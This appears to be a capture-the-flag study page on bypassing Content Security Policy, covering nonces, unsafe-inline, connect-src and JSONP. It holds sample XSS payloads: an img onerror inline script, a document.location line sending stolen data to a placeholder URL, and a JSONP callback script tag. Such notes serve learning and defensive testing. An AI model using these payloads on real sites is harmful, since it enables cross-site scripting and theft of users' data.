Content Security Policy (CSP)

csp_bypass_nonce

The Content Security Policy (CSP) is a security mechanism designed to make XSS and other web client attacks harder.

  • πŸ› We can block inline code execution (no onload/...)
  • πŸ–ΌοΈ We can configure the image policy (no external? whitelist? local?)
  • πŸ’₯ We can configure the script policy (no external? whitelist? local?)
  • 🐍 We can configure URLs that we can connect to (ex: fetch(URL))
  • ...

We can either use curl -i URL and manually inspect the CSP header and meta-tag or use Google CSP Evaluator.

Developers can allow some elements to bypass the CSP, such as one specific element allowed to load an external script using a nonce.

<script nonce="some_nonce_here">/*inline code allowed*/</script>

☠️ Nonce must be unique and not predictable for them to be useful.

CSP Bypass

CSP policies may not be correctly configured and bypassed. Refer to XSS Malicious Code and XSS Filter Bypass for more details.

CSP Bypass β€” unsafe-inline

csp_bypass_inline_code

If unsafe-inline is enabled, you can execute code using:

<img src=1 onerror="your_code_here" />

CSP Bypass β€” connect-src 'none'

csp_bypass_inline_code csp_bypass_jsonp csp_bypass_nonce

If connect-src is none, any external request will fail. Try:

  • document.location = 'URL/?param=' + <stolen_data> (CTF-only)
  • Automatically submit a hidden form after injecting data inside. Refer to CSRF.

CSP Bypass β€” JSONP β€” script-src

csp_bypass_jsonp

JSONP was designed to ease the process of connecting an API with the website code: the developer can write code automatically executed after the API has been called within the URL ☠️.

Well-known list of public JSONP APIs: JSONBee (0.6k ⭐). Look if your CSP policy is lax enough to allow any of them to be loaded.

<!-- don't forget "defer" or "async" -->
<script defer src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1);alert(2)"></script>